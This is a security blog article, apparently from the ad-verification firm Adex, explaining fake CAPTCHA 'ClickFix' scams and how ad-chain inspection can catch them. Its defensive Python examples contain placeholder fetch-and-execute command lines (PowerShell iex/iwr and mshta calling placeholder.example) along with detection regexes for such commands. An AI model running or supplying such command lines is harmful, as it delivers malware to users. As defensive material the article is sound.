Adex - fake CAPTCHA scams and ClickFix malware delivery through fake verification prompts.

Fake CAPTCHA Scams: When “I’m Not a Robot” Becomes the Trap

Someone clicks a link to stream a film, lands on the player, and a box slides over the page. It looks like the verification step everyone has clicked a thousand times: a checkbox, the familiar “I’m not a robot” wording, maybe a small grid of images. 

This one is different in a way that is easy to miss in the moment. Instead of asking for a click, it asks for three keystrokes. Press the Windows key and R together. Press Ctrl and V. Press Enter. The page frames this as proof you are human. What it has actually done is copy a command to the clipboard and talk the visitor into running it.

That command tells the computer to download and run malware. The attacker never has to break in, because the page has tricked the visitor into carrying out that step on their own machine. 

This is the move security researchers call ClickFix, and it has turned the most boring gesture on the web, clicking a verification box, into a delivery method for information stealers and remote access trojans. 

ESET recorded the technique climbing more than 500 percent between the second half of 2024 and the first half of 2025, making it the second most common attack vector its telemetry saw after phishing.

For advertisers and ad platforms, the challenge is that attackers like to ride the same channels everyone else uses to reach an audience. 

Many of these fake checks are pushed to people by abusing ad placements and the redirect chains behind them, often after a campaign has already cleared review. The creative that ran looked clean, the destination passed a first check, and the malicious instruction only surfaced several hops later.

This article follows the lure from the ad call to the keystroke, looks at what runs after the paste, and lays out where the chain can be caught before a visitor ever sees the box.


Key Takeaways

  • The current fake CAPTCHA tricks the visitor into running the malware themselves, usually by pasting a copied command into the Windows Run box, so no software exploit is needed, and most automated download defenses never engage.
  • The lure arrives through familiar channels: malicious ads, redirect chains off streaming and download sites, SEO-poisoned search results, and compromised legitimate pages.
  • What runs is typically fileless. The pasted command launches PowerShell or mshta, pulls a payload into memory, and drops an information stealer such as Lumma or a remote access trojan, often leaving little on disk.
  • The same fake check is also used for lower-stakes payouts: tricking visitors into approving browser push notifications or subscribing to premium SMS billing.
  • Because the creative under review is clean and the payload appears only after several redirects, the defensible posture is to follow the full chain, re-scan continuously, and treat high-reputation domains as no safer than any other.

What the Box Is Really Asking You to Do

A normal CAPTCHA asks you to prove you are human to a server. The image grids and checkboxes are running quiet checks in the background, and the visible puzzle is mostly there to buy time and read your behavior. Nothing you do leaves the page.

The fake version works the other way around. Instead of checking you inside the page, it asks you to step out of the browser and run a command on your own computer, and that command is the attack.

The most common script reads like a verification fix. The page says automated traffic was detected and asks you to complete a manual step: press Windows key + R to open the Run dialog, press Ctrl + V to paste, then press Enter to confirm. 

Between those instructions, a line of JavaScript on the page has already copied a command string to your clipboard. So when you paste, you are not pasting a verification code. You are pasting a one-line instruction that tells Windows to fetch and run a program. Pressing Enter executes it.

The genius of the framing is that every step feels like the kind of fiddly thing a real verification system might ask for. 

People are trained to comply with security prompts, especially ones that borrow the visual language of Google’s reCAPTCHA or Cloudflare’s checks. 

Malwarebytes notes that reCAPTCHA alone appears on more than eleven million sites, so the look is deeply familiar and rarely questioned. The attacker is not breaking into the machine. They are renting the trust the visitor already places in a checkbox.


How the Lure Reaches a Screen

A fake CAPTCHA is useless until it is in front of people, and the delivery side is where this stops being a consumer story and becomes an ad-ecosystem one. The lure travels along several routes at once.


Malicious advertising

The first is malicious advertising. Compromised or abusive ad placements redirect visitors to the fake-check page, frequently off the back of high-traffic destinations like streaming and file-download sites. 

Microsoft traced one campaign in which movie-streaming sites funneled viewers through a chain of redirectors, with a single set of malicious domains drawing what it described as tens of thousands, in some cases hundreds of thousands, of unique visitors a day. 


SEO poisoning

The second route is SEO poisoning, where attackers push booby-trapped pages up the search rankings for ordinary queries. 

Trend Micro documented a case in which a search for the stately home tourist attraction Longleat House returned a poisoned result that led to a ClickFix page. 


A straightforward compromise of legitimate sites

The third is a straightforward compromise of legitimate sites, where injected code shows the fake check to a fraction of visitors.

What ties these together for the buy side is that the malicious step lives deep in the chain. The ad creative can be clean, the first landing page can be clean, and the fake CAPTCHA only renders after one or more redirects, sometimes only for visitors who match a target profile.

A review that stops at the creative or the first URL sees nothing wrong. The same logic that lets cloaked campaigns pass moderation applies here, which is why this lure pairs naturally with the techniques covered in the Adex write-up on ad cloaking. The redirect-chain abuse that carries these pages is the same pattern flagged in the Adex report on malicious redirects detected in ad campaigns.


Why Three Keystrokes Defeat So Many Defenses

Most malware delivery has to get past something. A drive-by download fights the browser’s download warnings and the antivirus scanner. An email attachment fights the mail gateway and the user’s caution about opening files. ClickFix sidesteps the whole category by routing the dangerous step through an action that looks ordinary, so the defenses built to block it never engage.

When a command is pasted into the Run dialog, Windows treats it as something the account holder deliberately typed. There is no download prompt to dismiss, no file to mark as untrusted, no macro warning. 

The Federal Trade Commission describes the sequence plainly in its consumer alert, walking through the same Windows-R, Ctrl-V, Enter steps and warning people not to follow verification prompts that ask them to run anything. 

The clipboard hijack is what makes it seamless. 

The instruction is framed as a routine verification fix, and the visitor following it has no reason to expect the keystrokes will launch a program. The visitor never sees the command they are about to run, because copying it is invisible, and the Run box shows only a short string that scrolls out of view.

The instruction also tends to use tools that already ship with the operating system. Instead of dropping a new executable, the pasted line invokes PowerShell or mshta, both signed Microsoft utilities, to do the fetching. Defenders call these living-off-the-land binaries, and their presence is unremarkable on any Windows machine, so their sudden use raises fewer flags than an unknown program would.


What Runs After the Paste

The pasted command is rarely the malware itself. It is a launcher. Its job is to reach out, pull down the real payload, and run it with as little trace as possible.

In the cases Trend Micro analyzed, the launcher kicked off a multistage sequence: an initial script retrieved an obfuscated payload, often hidden inside an ordinary-looking file such as an MP3 or a PDF hosted on a legitimate file-sharing service, then executed it in memory through mshta or PowerShell without writing the final program to disk. 

Hosting the intermediate stages on trusted platforms helps the traffic blend in, a pattern that echoes the Adex analysis of the abuse of trusted domains. Because so much of this happens in memory, scanners that watch for suspicious files on disk have little to catch.
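Because the launcher leaves little on disk, the behavioural side of detection has to key on process lineage and command lines instead. The following is an added illustration, not Adex's or any vendor's code: it scans constructed process-creation events (the field names, the explorer.exe-parent rule for Run-dialog launches, and the regexes are all assumptions) and flags a signed Windows utility started from the Run dialog with a command line that fetches and runs remote content.

```python
"""Flag process-creation events that look like a ClickFix paste.
Added example; events are constructed, not real telemetry."""
import re

# Constructed events in the shape of a typical EDR / Sysmon process feed.
# URLs are placeholders, not real infrastructure.
EVENTS = [
    {"id": 1, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (iwr https://placeholder.example/x)"'},
    {"id": 2, "parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta https://placeholder.example/verify.mp3"},
    {"id": 3, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\Scripts\\backup.ps1"},
    {"id": 4, "parent": "services.exe", "image": "powershell.exe",
     "cmdline": 'powershell -c "iex (iwr https://placeholder.example/x)"'},
    {"id": 5, "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad https://placeholder.example/x"},
]

# Living-off-the-land binaries the article names as the usual launchers.
LOLBINS = {"powershell.exe", "mshta.exe", "cmd.exe", "wscript.exe"}
# Signs that the command line reaches out to the network ...
FETCH = re.compile(r"https?://|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b", re.I)
# ... and that it executes what it fetched in memory or hides its window.
EXEC = re.compile(r"\biex\b|invoke-expression|-enc\b|-e\s+[a-z0-9+/=]{20,}"
                  r"|-w(indowstyle)?\s+hidden", re.I)

def classify(ev):
    """Return the reasons an event is suspicious; an empty list means benign."""
    reasons = []
    if ev["image"].lower() not in LOLBINS:
        return reasons
    # Assumption for this demo: a command run from Win+R has explorer.exe
    # as its parent. Real deployments would also watch other parents.
    if ev["parent"].lower() != "explorer.exe":
        return reasons
    fetch = bool(FETCH.search(ev["cmdline"]))
    if fetch:
        reasons.append("remote fetch in command line")
    if EXEC.search(ev["cmdline"]):
        reasons.append("in-memory execution or hidden window")
    # mshta given a URL downloads and runs the content by itself.
    if fetch and ev["image"].lower() == "mshta.exe":
        reasons.append("mshta executing remote content")
    return reasons

def triage(events):
    """Map event id -> reasons for every event that classify() flags."""
    out = {}
    for ev in events:
        reasons = classify(ev)
        if reasons:
            out[ev["id"]] = reasons
    return out
```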

The payload at the end is usually built to monetize the machine fast. Information stealers dominate, and Lumma Stealer has been the most prolific of them, harvesting saved passwords, browser cookies, autofill data, and cryptocurrency wallet details. 

The same delivery method has been seen dropping Rhadamanthys and other stealers, along with remote access trojans such as AsyncRAT, XWorm, and NetSupport, and loaders like Latrodectus that pull in whatever comes next. The technique is not confined to Windows either. 

Researchers have observed macOS variants steering visitors toward terminal commands that install the Atomic stealer. The throughline is speed and quiet: get credentials and session tokens off the machine before anyone notices, using tools that leave little behind.

Figure: From Ad Click to In-Memory Payload. How a fake CAPTCHA travels to a fileless payload (legend: ad chain, catchable; harmful step).

  1. Ad click or poisoned search result: clean creative, clean first page.
  2. Redirect chain: several hops, target profiling.
  3. Fake CAPTCHA page: “Verify you are human”.
  4. Clipboard silently loaded: the page copies a command.
  5. Visitor is talked into it: Win + R, Ctrl + V, Enter. Windows treats it as trusted.
  6. Fileless payload in memory: PowerShell or mshta fetches the payload, an info stealer or remote access trojan.

The Quieter Payouts: Fake Push Notifications and Premium Billing

Not every fake check is reaching for a stealer. The same template is profitable at lower stakes, and these variants matter for the ad world because they monetize through legitimate-looking channels rather than outright malware.

One version uses the fake CAPTCHA to harvest a browser push notification subscription. The “verify” button is wired to the browser’s own permission prompt, so clicking what looks like a human check actually grants the site permission to send notifications. 

From then on, the deceived visitor receives a stream of pushed ads and scam alerts straight to the desktop, well after they have left the page. 

Malwarebytes documents this clipboard-and-permission pattern in detail, including a tutorial video variant where the page embeds a short clip showing the visitor exactly which keys to press. 

Another version routes the visitor into a premium SMS or subscription billing flow, where completing the “verification” signs them up for a recurring charge. These do not infect the machine, which is part of why they survive. They look like ordinary opt-ins, and the harm shows up later on a phone bill or as an unrelenting notification feed.

The thing being abused here is consent, not the format. A push subscription a person genuinely opts into is a normal, useful channel. The fake check forges that opt-in, capturing a subscription the visitor never meant to give. For a platform, that is the line worth watching: a placement does not have to deliver code to harm the experience, and a redirect that tricks someone into a subscription they did not choose traces back to the ad that started it just as a malware page would.


Spotting It Before the Paste

The single most useful rule is the one the FTC leads with: a real CAPTCHA never asks you to open a program, press Windows-R, or paste anything. Verification happens inside the page. The moment a “human check” gives you a task to perform elsewhere on your computer, the check is the attack. Anyone who manages a household or a team can pass that one line along and prevent most of these infections outright.

A few more signals help. 

Legitimate verification does not require keyboard shortcuts that open system dialogs, so any prompt mentioning the Run box, the Terminal, or PowerShell is disqualifying on its face. The pages often spoof familiar brands in their domain names while sitting on URLs that do not match the service they imitate, so the address bar is worth a glance before acting. And because the command is hidden on the clipboard, a careful user who pastes into a text editor instead of the Run box will see a long, unfamiliar instruction rather than a short code, which is itself the answer. 

On the recovery side, anyone who has already run one of these should assume saved credentials and session cookies were taken: disconnect, run a full scan, and change passwords from a different device, starting with email and banking.


Where Detection Sits in the Ad Chain

For users, defense is a habit. For the ad ecosystem, it is an inspection problem, and it lands on the same ground as other post-click abuse. The malicious page rarely sits in the creative or on the first destination. It usually lives several redirects downstream, shown only to a slice of visitors and often switched on after the campaign clears review.

That shape dictates the response. A scan that reads the ad tag and stops never reaches the fake-check page, so detection has to follow the redirect chain the whole way, the way a real visitor’s browser would, and render what actually appears at the end. 

Since the payload can be switched on after approval, a single check at submission is not enough, and continuous re-scanning closes the window that timing attacks rely on. And because the lure rides on high-traffic, reputable destinations, reputation is a weak filter on its own, so the same scrutiny has to apply to trusted domains. 

Adex applies validation across the chain that flags redirect behavior and destination content rather than trusting the creative alone, which is the layer where a fake CAPTCHA served three hops past a clean ad becomes visible. 
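The two halves of this article, the clipboard-and-keystroke page described earlier and the full-chain inspection described here, meet in the following added example. It is illustration code written for this write-up, not Adex's scanner: it follows a constructed redirect chain to its final page and scores that page for the ClickFix markers the article names. The hop map, the HTML, the indicator weights and the threshold are all assumptions.

```python
"""Follow a redirect chain to the page a visitor actually reaches, then
score that page for fake-CAPTCHA / ClickFix markers. Added example; the
chain and pages below are constructed stand-ins for live fetches."""
import re

# Constructed redirect chain: each URL maps to the URL it redirects to.
CHAIN = {
    "https://ad.example/click?id=1": "https://redirector-one.example/r",
    "https://redirector-one.example/r": "https://redirector-two.example/go",
    "https://redirector-two.example/go": "https://verify-check.example/human",
}
# Constructed HTML served by the URLs that do not redirect.
PAGES = {
    "https://verify-check.example/human": """
      <h2>Verify you are human</h2>
      <p>Press Windows key + R, then Ctrl + V, then Enter to continue.</p>
      <script>
        navigator.clipboard.writeText("powershell -c PLACEHOLDER_NOT_A_REAL_COMMAND");
      </script>""",
    "https://clean.example/landing": "<h1>Welcome</h1><p>Nothing to verify here.</p>",
}

# (name, weight, pattern). Weighted so that one innocent phrase (a real
# CAPTCHA also says "not a robot") cannot trip the detector by itself.
INDICATORS = [
    ("clipboard_write", 3, re.compile(r"clipboard\.writeText|execCommand\(\s*['\"]copy", re.I)),
    ("run_dialog_keys", 3, re.compile(r"win(dows)?\s*(key)?\s*\+\s*r\b", re.I)),
    ("paste_keys", 2, re.compile(r"ctrl\s*\+\s*v\b", re.I)),
    ("verify_human", 1, re.compile(r"verify\s+you\s+are\s+human|not\s+a\s+robot", re.I)),
    ("lolbin", 3, re.compile(r"\b(powershell|mshta|cmd\.exe)\b", re.I)),
]

def follow_chain(url, max_hops=10):
    """Return every URL visited, ending at the first one that serves a page."""
    hops = [url]
    while url in CHAIN and len(hops) <= max_hops:
        url = CHAIN[url]
        hops.append(url)
    return hops

def score_page(html):
    """Return (score, names of matched indicators) for one rendered page."""
    hits = [(name, w) for name, w, rx in INDICATORS if rx.search(html)]
    return sum(w for _, w in hits), [name for name, _ in hits]

def inspect(url, threshold=6):
    """Follow the chain as a visitor's browser would and judge the last page."""
    hops = follow_chain(url)
    score, hits = score_page(PAGES.get(hops[-1], ""))
    return {"final": hops[-1], "hops": len(hops) - 1, "score": score,
            "hits": hits, "verdict": "clickfix" if score >= threshold else "clean"}
```

A scan that stopped at the first hop of the constructed chain would see a redirect and nothing else; only the rendered final page carries the markers.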

The broader pattern, and how it has shown up across recent campaigns, runs through the Adex roundup of the biggest malware scandals of 2025.

Figure: Shallow Scan vs Full-Chain Inspection (Adex). What a shallow scan sees versus what a visitor gets: two lanes share one approved ad creative. The shallow lane stops at the tag, sees a clean first page and flags nothing. The full-chain lane follows three redirects (redirector 1, redirector 2, profiling gate) to a fake CAPTCHA page and catches it at the destination. Between them, three things close the gap: follow every redirect, render the final page, re-scan after approval.

The Shape of the Problem

Fake CAPTCHA scams work because they borrow two kinds of trust at once. They borrow the visitor’s trust in a checkbox they have clicked countless times, and they borrow the ad chain’s tendency to judge a campaign by its creative. 

The first is a habit that a single clear rule can break: real verification never asks you to run a command. The second is structural, and it does not get solved at the moment of approval. A clean creative and a clean first page tell you almost nothing about what a real visitor reaches three redirects later. Closing the gap means inspecting the whole path, rendering the destination as a browser would, and re-checking after a campaign goes live, so that a verification box asking for three keystrokes is caught as what it is before it reaches a screen.


FAQ

Is the fake CAPTCHA itself the malware?

No. The page is the lure. The harm comes from the command it copies to your clipboard and persuades you to run. The page can sit on an otherwise ordinary site and does nothing until you follow the keystroke instructions, which is why the advice to never run anything a CAPTCHA asks for is the whole defense for most people.


Why does pasting a command work when downloading a file would get blocked?

Because the operating system treats a command you paste into the Run dialog as a deliberate action by the account holder. There is no download warning and no untrusted-file flag, and the command usually calls built-in Windows tools like PowerShell, so it looks routine. The attacker gets the user to perform the step that security software is designed to intercept.


How does an ad lead to one of these pages if the creative was approved?

The malicious page is normally several redirects past the ad and may appear only for certain visitors or only after the campaign has cleared review. A check that examines the creative or the first landing page can pass it, while the fake CAPTCHA waits further down the chain. Catching it means following the redirects to the final rendered page rather than trusting the approved creative.


What should someone do if they have already pasted and run the command?

Treat the machine as compromised. Disconnect it from the network, run a full security scan, and change passwords from a different device, prioritizing email, banking, and any account with saved logins, since stealers target browser-stored credentials and session cookies first. Enabling multifactor authentication where it is not already on helps limit the reuse of stolen passwords.


Are Macs and phones affected, or just Windows?

Windows is the main target because the Run dialog makes the trick smooth, but researchers have observed macOS versions that steer visitors toward Terminal commands installing the Atomic stealer. The defining behavior is the same on any system: a verification prompt that asks you to run a command somewhere outside the page is the attack, regardless of the operating system.